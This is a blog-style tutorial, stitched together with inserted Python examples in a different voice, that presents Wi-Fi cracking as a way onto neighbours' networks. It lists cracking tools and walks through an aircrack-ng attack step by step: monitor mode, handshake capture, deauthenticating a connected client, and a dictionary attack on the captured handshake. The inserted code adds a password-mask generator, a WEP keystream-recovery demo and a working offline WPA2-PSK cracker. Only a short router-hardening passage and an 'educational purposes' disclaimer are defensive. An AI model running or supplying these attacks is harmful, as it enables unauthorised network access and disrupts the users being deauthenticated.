The Internet has become one of the most important requirements of modern life; for some of us it is the source of our income. With the growing use of the Internet and of handy devices like smartphones, tablets and other smart gadgets, almost everything is now available online in digital form.
Gone are the days when people stayed connected only through a mobile data pack: to get online you need your laptop, desktop or smartphone attached to a network.
This is why people prefer a wireless connection at home and in the office, so that all their devices can connect and work efficiently. In your neighbourhood, school, college or office premises you will have come across Wi-Fi networks, but you cannot use them unless you have the correct password. Most networks are protected with a key so that nobody but authorized users can access them.
Must visit: How To Find Out WiFi Password Of Your WiFi Network
I know how it feels when you are right next to an Internet connection and cannot use it because of that password. Even when your own network is down, you desperately want to join the neighbouring Wi-Fi network to get your work done.
But can you do anything about it? Can you access a Wi-Fi network without its password? Yes, if it is done with good Wi-Fi password cracking software. So let us look at the best software for your Windows PC or laptop for cracking Wi-Fi passwords.
Top 5 Wi-Fi Password Cracker Software for Windows
1. Aircrack
Aircrack-ng is one of the most popular wireless password cracking suites and handles 802.11a/b/g WEP and WPA/WPA2-PSK cracking. It works by capturing packets: for WEP it recovers the key statistically once enough encrypted packets (unique IVs) have been gathered, and for WPA/WPA2-PSK it runs a dictionary attack against a captured four-way handshake.
Aircrack-ng runs on Windows, Linux, OS X, OpenBSD, NetBSD, Solaris and more.
2. Smartkey WiFi Password Recovery
This is actually a WiFi password recovery application, but it can be used just as well to crack the password of a WiFi connection. It is a powerful WiFi password cracking tool for Windows; the vendor claims it can recover any type of high-security WiFi password, which in practice means any password that one of its attack modes can guess.
The software provides five different attack modes for cracking a WiFi password: dictionary attack, word attack, mask attack, combination attack and hybrid attack.
The dictionary attack tries every entry of a wordlist. The word attack tries all the anagrams and mutations of a single word. The mask attack is used when you already know something about the WiFi password, for example its length, its first or last character, how many digits it contains and so on; it only enumerates candidates that fit that pattern, which can shrink the search enormously.
The combination attack tries all possible combinations of two words, and the hybrid attack applies mutations to every word of the dictionary. You can also supply more than one dictionary for cracking the WiFi password.
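The mask and hybrid attacks described above, as an added example that is not code from the original post or from any of the products named: a small hashcat-style mask engine that expands a mask such as ?u?l?l?l?d?d into candidates, computes how many candidates a mask describes, and builds hybrid candidates (dictionary word plus a mask suffix). The charset letters, the example masks and the guess rate used for the time estimate are assumptions chosen for illustration.

```python
import itertools
import string
from typing import Iterable, Iterator, List

# Hashcat-style character classes (assumed naming): ?a is every printable ASCII character.
CHARSETS = {
    "l": string.ascii_lowercase,        # 26
    "u": string.ascii_uppercase,        # 26
    "d": string.digits,                 # 10
    "s": " " + string.punctuation,      # 33
}
CHARSETS["a"] = CHARSETS["l"] + CHARSETS["u"] + CHARSETS["d"] + CHARSETS["s"]  # 95


def parse_mask(mask: str) -> List[str]:
    """Turn a mask such as '?u?l?l?l?d?d' into one alphabet per position.
    A bare character is a fixed position; '??' stands for a literal question mark."""
    positions: List[str] = []
    i = 0
    while i < len(mask):
        if mask[i] == "?":
            if i + 1 >= len(mask):
                raise ValueError("dangling '?' at end of mask")
            token = mask[i + 1]
            positions.append("?" if token == "?" else CHARSETS[token])
            i += 2
        else:
            positions.append(mask[i])
            i += 1
    return positions


def keyspace(mask: str) -> int:
    """Number of candidates the mask expands to: the product of the alphabet sizes."""
    n = 1
    for alphabet in parse_mask(mask):
        n *= len(alphabet)
    return n


def mask_candidates(mask: str) -> Iterator[str]:
    """Enumerate every candidate the mask describes, in lexicographic order."""
    for combo in itertools.product(*parse_mask(mask)):
        yield "".join(combo)


def hybrid_candidates(words: Iterable[str], suffix_mask: str) -> Iterator[str]:
    """Hybrid attack: each dictionary word followed by every expansion of the mask,
    e.g. 'summer' + '?d?d' gives summer00 .. summer99."""
    for word in words:
        for suffix in mask_candidates(suffix_mask):
            yield word + suffix


def seconds_to_exhaust(mask: str, guesses_per_second: float) -> float:
    """Worst-case time to try the whole mask at a given guess rate."""
    return keyspace(mask) / guesses_per_second


if __name__ == "__main__":
    # Constructed guess rate: a few thousand WPA guesses per second is typical for
    # a CPU cracker, because every guess costs a PBKDF2 derivation.
    rate = 2000.0
    for m in ("?d?d?d?d?d?d?d?d", "?u?l?l?l?l?d?d", "?a?a?a?a?a?a?a?a"):
        hours = seconds_to_exhaust(m, rate) / 3600
        print(f"{m:20s} keyspace={keyspace(m):>20,d}  worst case {hours:,.1f} h")
    print(list(itertools.islice(hybrid_candidates(["summer", "winter"], "?d?d"), 3)))
```

The point the numbers make: eight digits (10^8 candidates) is a matter of hours at a few thousand guesses per second, while eight characters drawn from all 95 printables (95^8) is not feasible at that rate, which is why a mask attack is only useful when you genuinely know the password's structure.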
3. Kismet
Kismet is a network detector, packet sniffer and wireless intrusion detection system for 802.11 wireless LANs. It works with any card that supports raw monitor mode and can sniff 802.11a, 802.11b, 802.11g and 802.11n traffic.
Kismet does not crack passwords itself; it sniffs passively and records what it sees. That lets it reveal networks that do not broadcast their SSID, show which encryption each access point uses (open, WEP, WPA or WPA2) and save the captured packets for other tools such as aircrack-ng to work on. It also flags default or unconfigured access points, which tells you how much effort a given network is likely to take.
Classic Kismet is split into three parts: a drone that captures packets from the wireless network, a server that receives them from the drone and turns them into network information, and a client that talks to the server and displays everything it has collected.
4. AirSnort
AirSnort is a wireless LAN tool that recovers the encryption keys of 802.11b WEP networks; it runs on Linux and Microsoft Windows. AirSnort saves data in two formats: every packet it captures is written to a pcap dump file, and the state of a capture session is saved as a crack file.
Running AirSnort is quite easy. Once launched it must be configured to use the wireless NIC, after which it passively monitors all transmissions and computes the key as soon as enough packets (weak IVs) have been gathered. Note that AirSnort is no longer maintained and needs far more packets than the PTW attack in aircrack-ng.
5. NetStumbler
NetStumbler (Network Stumbler) is a Windows tool that detects 802.11a, 802.11b and 802.11g wireless LANs. It is used to verify wireless network configuration, track down the cause of wireless interference, detect unauthorized (rogue) access points, wardrive and locate areas with poor coverage or weak security.
NetStumbler has one drawback: it scans actively by sending probe requests, so most wireless intrusion detection systems spot it easily.
Do you know about any better WiFi password cracker software? Let me know through comments.
Nowadays we can usually see a neighbour's WiFi network, but when we try to connect it asks for a password, because the network is protected with WEP or WPA/WPA2. Here is how such a wireless password can be cracked using aircrack-ng.
Hacking wireless wifi passwords
The most common types of wireless security are Wired Equivalent Privacy (WEP) and Wi-Fi Protected Access (WPA and WPA2).
WEP was the original encryption standard for wireless, meant to make a wireless network as private as a wired one. It encrypts every frame with RC4 keyed by a 24-bit per-frame IV prepended to the shared key, and that design has statistical weaknesses: open source utilities such as aircrack-ng, weplab, WEPCrack and airsnort examine enough captured packets, look for those patterns in the encryption and recover the key outright. WEP comes in different key sizes; the common ones are 64-bit (a 40-bit key plus the IV) and 128-bit (a 104-bit key plus the IV), with 256-bit offered by some vendors. The key size makes little difference to the attack.
Later WPA and WPA2 were introduced to overcome the problems of WEP. WPA was an interim subset of the 802.11i security standard (TKIP) that replaced the original 802.11 WEP design; WPA2 implements the full 802.11i standard with AES-CCMP. Using a long random passphrase makes WPA/WPA2-PSK practically uncrackable, but if a short passphrase (say, under 14 characters) or one that appears in a wordlist is used, an aircrack-ng dictionary attack can recover it quickly, often in minutes. Most users pick exactly that kind of passphrase, so aircrack-ng is the tool to use.
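The "patterns in the encryption" that WEP crackers look for, shown as an added example that is not code from the original post or from any of the tools named: a minimal RC4/WEP model demonstrating that because the 24-bit IV is the only per-frame key material, two frames sent under the same IV share a keystream, so XORing them cancels the keystream, and a known header (the LLC/SNAP header that starts nearly every data frame) then reveals the other frame's plaintext without ever learning the key. The key, IV and frame contents are constructed, and the CRC-32 ICV that real WEP appends is omitted. aircrack-ng's FMS/KoreK/PTW attacks use a related but different RC4 weakness (the IV sits at the front of the per-frame key and leaks key bytes through the key schedule), which this example does not reproduce.

```python
from typing import Tuple


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4 (key scheduling + output generation). WEP seeds it with IV || root key per frame."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(root_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body without the ICV: the 3-byte IV is sent in the clear, the payload is
    plaintext XOR RC4(IV || root key). root_key is 5 bytes (WEP-64) or 13 bytes (WEP-128)."""
    if len(iv) != 3 or len(root_key) not in (5, 13):
        raise ValueError("WEP uses a 3-byte IV and a 5- or 13-byte root key")
    ks = rc4_keystream(iv + root_key, len(plaintext))
    return iv + bytes(p ^ k for p, k in zip(plaintext, ks))


def wep_decrypt(root_key: bytes, frame: bytes) -> bytes:
    iv, body = frame[:3], frame[3:]
    ks = rc4_keystream(iv + root_key, len(body))
    return bytes(c ^ k for c, k in zip(body, ks))


def recover_from_iv_reuse(frame_a: bytes, frame_b: bytes, known_plaintext_a: bytes) -> bytes:
    """Two frames with the same IV share a keystream, so C_a XOR C_b = P_a XOR P_b.
    Knowing P_a (or a prefix of it) reveals the same bytes of P_b with no key at all."""
    if frame_a[:3] != frame_b[:3]:
        raise ValueError("frames do not share an IV")
    body_a, body_b = frame_a[3:], frame_b[3:]
    return bytes(a ^ b ^ p for a, b, p in zip(body_a, body_b, known_plaintext_a))


# 802.2 LLC/SNAP header that starts almost every WEP data frame (here for ARP), followed by the
# fixed first eight bytes of an ARP request: an attacker can assume this plaintext for any ARP frame.
LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")
ARP_FIXED = bytes.fromhex("0001080006040001")
IV_SPACE = 2 ** 24  # only 16,777,216 IVs exist, so a busy AP repeats them within hours


def demo() -> Tuple[bytes, bytes]:
    """Constructed scenario: an ARP request and a secret frame encrypted under the same IV;
    returns (recovered prefix of the secret, the real prefix) so they can be compared."""
    root_key = bytes.fromhex("0123456789")   # constructed 40-bit WEP-64 key
    iv = bytes.fromhex("a1b2c3")              # the reused IV
    secret = b"\xaa\xaa\x03\x00\x00\x00\x08\x00GET /admin HTTP/1.0"
    frame_a = wep_encrypt(root_key, iv, LLC_SNAP_ARP + ARP_FIXED)
    frame_b = wep_encrypt(root_key, iv, secret)
    recovered = recover_from_iv_reuse(frame_a, frame_b, LLC_SNAP_ARP + ARP_FIXED)
    return recovered, secret[: len(recovered)]


if __name__ == "__main__":
    recovered, expected = demo()
    print("recovered:", recovered, "matches:", recovered == expected)
```

Because the 8-byte LLC/SNAP header is predictable for every IP or ARP frame, the first eight bytes of keystream for any IV can be recovered from a single captured frame; that known keystream is the building block of the chopchop and fragmentation attacks that aircrack-ng's companion tools use to inject traffic and collect IVs faster.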
Securing Wireless Network
The first step in securing a wireless connection is simply using a long random passphrase of at least 14 characters. If your WiFi device supports WPA2, use it, with AES (CCMP) rather than TKIP; many users do not realise that their device supports several security modes. Check which modes your router supports on its configuration page.
If you do not know how to edit the router settings, open your browser and type the router's address in the address bar (192.168.1.1 is a common default, but check the gateway address your computer was given); the configuration page that appears is where you select the security mode and passphrase.
Cracking Wireless Network
As described above, this is straightforward: we put our network card into monitor mode so that it captures packets from the target network. Monitor mode is driver dependent, and only a small number of cards support it under Windows, so the usual route is a Linux live CD (commonly BackTrack, today Kali Linux) or a Linux virtual machine with a USB adapter that supports monitor mode and packet injection. The aircrack-ng project maintains a list of compatible cards.
Download aircrack-ng for Linux or Windows from the aircrack-ng project site.
The aircrack-ng suite is a collection of command-line programs aimed at WEP and WPA-PSK key
cracking. The ones we will be using are:
airmon-ng - script used for switching the wireless network card to monitor mode
airodump-ng - for WLAN monitoring and capturing network packets
aireplay-ng - used to generate additional traffic on the wireless network
aircrack-ng - used to recover the WEP key, or launch a dictionary attack on WPA-PSK using the captured data.
Using aircrack-ng
First, put the card in monitor mode :
root@bt:~# airmon-ng
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
root@bt:~# airmon-ng start wlan0
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
(monitor mode enabled on mon0)
Ok, we can now use interface mon0
Let’s find a wireless network that uses WPA2 / PSK :
root@bt:~# airodump-ng mon0
CH 6 ][ Elapsed: 4 s ][ 2009-02-21 12:57
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:19:5B:52:AD:F7 -33 5 0 0 10 54 WPA2 CCMP PSK TestNet
BSSID STATION PWR Rate Lost Packets Probe
00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -29 0- 1 12 4 TestNet
Stop airodump-ng and run it again, writing all packets to disk :
airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2
At this point you have two options: either wait until a client connects and the four-way handshake completes, or deauthenticate an existing client and force it to reassociate. Time is money, so let's force the deauthentication. We need the BSSID of the AP (-a) and the MAC of a connected client (-c):
root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0
13:04:19 Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10
13:04:20 Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]
As a result, airodump-ng should indicate “WPA Handshake:” in the upper right corner
CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:19:5B:52:AD:F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet
BSSID STATION PWR Rate Lost Packets Probe
00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -27 54-54 0 230
Stop airodump-ng and make sure the files were created properly. Running aircrack-ng on the .cap file without a wordlist lists the networks in the capture and shows "1 handshake" next to the BSSID when the capture is usable; if it shows 0, start airodump-ng again and repeat the deauthentication.
root@bt:/# ls /tmp/wpa2* -al
-rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap
-rw-r--r-- 1 root root 476 2009-02-21 13:04 /tmp/wpa2-01.csv
-rw-r--r-- 1 root root 590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv
From this point forward you do not need to be anywhere near the wireless network. All cracking happens offline, so you can stop airodump-ng and the other processes and walk away from the AP. In fact I would suggest walking away and finding yourself a cosy place where you can live, eat, sleep and so on.
Cracking a WPA2-PSK key is based on brute force, and it can take a very, very long time: every guess costs 4096 rounds of PBKDF2-HMAC-SHA1 before it can be checked against the handshake.
There are two ways of brute forcing: one that is relatively fast but does not guarantee success, and one that is very slow but guarantees that you will find the key at some point in time.
The first option is a wordlist/dictionary file. Many of these can be found on the Internet (e.g. www.theargon.com or the packetstorm archives), or they can be generated with tools such as John the Ripper. Once you have the wordlist, all you need to do is run aircrack-ng with it and feed it the .cap file that contains the WPA2 handshake.
So if your wordlist is called word.lst (under /tmp/wordlists), you can run
aircrack-ng -w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap
The success of cracking the WPA2-PSK key is directly linked to the quality of your wordlist. In other words, you may get lucky and get the key very fast, or you may not get the key at all.
The second method (exhaustive brute force) is guaranteed to succeed, but it may take ages to complete. Keep in mind that a WPA2 passphrase can be anything from 8 to 63 printable ASCII characters (the raw 256-bit PSK is written as 64 hex digits), so in theory you would have to build every password combination from every possible character set and feed them all into aircrack-ng.
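The offline attack just described, as an added example that is not code from the original post or from aircrack-ng: it implements the WPA2-PSK key derivation that the earlier WPA/WPA2 section alludes to (PBKDF2-HMAC-SHA1 with the SSID as salt, 4096 iterations) and the check a dictionary attack performs on a captured handshake (PMK to PTK via the 802.11i PRF, then the HMAC-SHA1 MIC over EAPOL-Key message 2 compared with the MIC the client sent). The AP and client MACs and the SSID TestNet are taken from the airodump-ng output above; the passphrase, the nonces and the EAPOL frame are constructed here, since no real capture is on the page.

```python
import hashlib
import hmac
import struct
import time
from typing import Dict, Iterable, Optional


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits) per IEEE 802.11i.
    The SSID is the salt, which is why precomputed tables only help for one network name."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid.encode("utf-8"), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, cut to 64 bytes."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest() for i in range(4)]
    return b"".join(blocks)[:64]


def wpa_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK plus the values visible in the 4-way handshake: both MACs and both nonces."""
    data = min(ap_mac, client_mac) + max(ap_mac, client_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


MIC_OFFSET = 81  # EAPOL header (4 bytes) + EAPOL-Key fields preceding the 16-byte Key MIC


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2/CCMP key MIC: HMAC-SHA1 over the EAPOL-Key frame with the MIC field zeroed,
    truncated to 16 bytes. The KCK is the first 16 bytes of the PTK."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, key_data: bytes = b"") -> bytes:
    """Constructed EAPOL-Key message 2 (client -> AP) with an all-zero MIC field.
    Key Information 0x010A = descriptor version 2 (HMAC-SHA1), Pairwise, MIC present."""
    body = (struct.pack(">BHHQ", 2, 0x010A, 16, 1)              # RSN descriptor, key info, key length, replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8  # SNonce, key IV, key RSC, key ID
            + b"\x00" * 16                                        # MIC placeholder
            + struct.pack(">H", len(key_data)) + key_data)
    return struct.pack(">BBH", 1, 3, len(body)) + body            # EAPOL version 1, type 3 = EAPOL-Key


def crack_handshake(hs: Dict[str, bytes], wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: derive PMK -> PTK -> MIC for each candidate and compare it with
    the MIC the client actually sent. Everything needed is in the capture; the AP is never contacted."""
    for candidate in wordlist:
        pmk = wpa_pmk(candidate, hs["ssid"].decode("utf-8"))
        ptk = wpa_ptk(pmk, hs["ap_mac"], hs["client_mac"], hs["anonce"], hs["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], hs["eapol"]), hs["mic"]):
            return candidate
    return None


def make_test_handshake(passphrase: str) -> Dict[str, bytes]:
    """Constructed handshake for the page's TestNet AP and client; nonces are made up."""
    ssid, ap, client = b"TestNet", bytes.fromhex("00195B52ADF7"), bytes.fromhex("001CBF905BA3")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    ptk = wpa_ptk(wpa_pmk(passphrase, ssid.decode("utf-8")), ap, client, anonce, snonce)
    frame = build_msg2(snonce)
    mic = eapol_mic(ptk[:16], frame)
    frame = frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]
    return {"ssid": ssid, "ap_mac": ap, "client_mac": client,
            "anonce": anonce, "snonce": snonce, "eapol": frame, "mic": mic}


if __name__ == "__main__":
    hs = make_test_handshake("letmein123")                       # constructed weak passphrase
    words = ["password", "qwerty123", "trustno1", "letmein123"]  # constructed wordlist
    t0 = time.perf_counter()
    found = crack_handshake(hs, words)
    elapsed = time.perf_counter() - t0
    print(f"recovered: {found!r}  ({len(words) / elapsed:.0f} guesses/s on this CPU)")
```

Note that the only per-guess work is the PBKDF2 derivation; the PTK and MIC steps are cheap. That is why a GPU cracker or a precomputed PMK table for a common SSID changes the picture, and why a passphrase that is not in any wordlist and too long to enumerate is the defence that actually works.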
Hope you enjoy(-_-) this post.!
Note: This tutorial is only for Educational Purposes.